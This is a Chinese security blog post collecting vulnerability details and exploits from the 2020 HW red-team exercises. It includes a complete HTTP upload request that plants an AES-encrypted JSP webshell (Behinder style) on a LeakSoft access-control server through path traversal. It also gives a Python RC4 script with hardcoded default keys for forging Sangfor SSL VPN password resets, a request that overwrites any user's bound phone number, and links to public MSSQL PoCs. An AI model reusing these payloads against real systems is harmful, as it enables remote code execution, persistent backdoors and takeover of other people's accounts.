HW2020 – 漏洞跟踪4

  • A+
所属分类:安全闲碎

漏洞汇总

HW2020 - 漏洞跟踪4

https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#(密码:gf34) 《HW2020 - 0day总结》



9月19日更新

7.联软准入漏洞


漏洞详情:


任意文件上传漏洞,存在于用户自检报告上传时,后台使用黑名单机制对上传的文件进行过滤和限制,由于当前黑名单机制存在缺陷,文件过滤机制可以被绕过,导致存在文件上传漏洞;利用该漏洞可以获取webshell权限。(猜测利用黑名单的其他后缀名绕过)

命令执行漏洞,存在于后台资源读取过程中,对于自动提交的用户可控参数没有进行安全检查,可以通过构造特殊参数的数据包,后台在执行过程中直接执行了提交数据包中的命令参数,导致命令执行漏洞;该漏洞能够以当前运行的中间件用户权限执行系统命令,根据中间件用户权限不同,可以进行添加系统账户,使用反弹shell等操作。


POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath" ../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

21.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞

乌龙事件:https://mp.weixin.qq.com/s/Wm_gGZyLXj1S3WTUiaUYQA

https://www.cnvd.org.cn/flaw/show/CNVD-2020-27769

23.Yii反序列化RCE利用链分析

见公众号,今日推送第二篇文章。


24.深信服SSL VPN nday Pre auth任意密码重置

来自微信热心网友的分享:

某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码

利用条件:需要登录账号

M7.6.6R1版本key为20181118

M7.6.1key为20100720


计算RC4_STR_LEN脚本from Crypto.Cipher import ARC4from binascii import  a2b_hexdef myRC4(data,key):    rc41 = ARC4.new(key)    encrypted = rc41.encrypt(data)    return encrypted.encode('hex')def rc4_decrpt_hex(data,key):    rc41 = ARC4.new(key)    return rc41.decrypt(a2b_hex(data))key = '20100720'data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'print(myRC4(data,key))



POST https://<PATH>/por/changepwd.csp
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)

HW2020 - 漏洞跟踪4

25.深信服SSL VPN 修改绑定手机号

来自微信热心网友的分享:(来源:渗了个透 公众号)

修改手机号接口未正确鉴权导致越权覆盖任意用户的手机号码

利用:需要登录账号

POST https://路径/por/changetelnum.csp?apiversion=1    newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sid=0&ip=127.0.0.1
HW2020 - 漏洞跟踪4


27.mssql远程代码执行(CVE-2020-0618)

poc: https://github.com/euphrat1ca/CVE-2020-0618

https://github.com/wortell/cve-2020-0618


暂无POC的漏洞如下,欢迎各位师傅提供线索:

9.深信服 SSL VPN 远程代码执行漏洞14.coremail 0day - may be rce15.activemq远程代码执行0day18.CVE-2020-7293  McAfee Web 多个高危漏洞20.VMware Fusion 权限提升漏洞(CVE-2020-398021.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞22. Weblogic IIOP 反序列化漏洞26.Spectrum Protect Plus任意代码执行漏洞(cve-2020-4711




感谢几位在公众号回复,提供新poc和详情的朋友,出于安全考虑,这里就不公布你们的id了。


也欢迎其他的朋友进行分享,无论是一篇文章,还是一个poc。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: